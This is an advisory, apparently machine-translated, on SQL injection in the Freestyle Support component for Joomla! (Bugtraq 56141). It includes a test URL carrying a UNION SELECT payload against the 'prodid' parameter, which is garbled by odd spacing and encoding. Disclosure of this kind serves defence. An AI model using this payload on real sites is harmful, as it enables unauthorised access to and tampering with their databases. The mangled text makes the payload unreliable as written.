Release date:
Updated on:
Affected Systems:
Joomla! Joomla!
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56141
Joomla! Is an Open Source Content Management System (CMS ).
Freestyle Support 1.9.1.1447 and other components have the SQL injection vulnerability. After successful exploitation, attackers can control the application, access or modify data, or exploit other vulnerabilities in the underlying database.
<* Source: D4NB4R
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/index.php? Option = com_fss & amp; view = test & amp; prodid = 777777.7 '+ union + all + select + 77777777777777% 2C77777777777777% 2c7777777777777777% 2 Cversion () % %% 2C77777777777777% 2C77777777777777% 2c7777777777777777% 2C77777777777777% 2c7777777777777777% 2c777777777777 -- + D4NB4R
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Joomla!
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.joomla.org/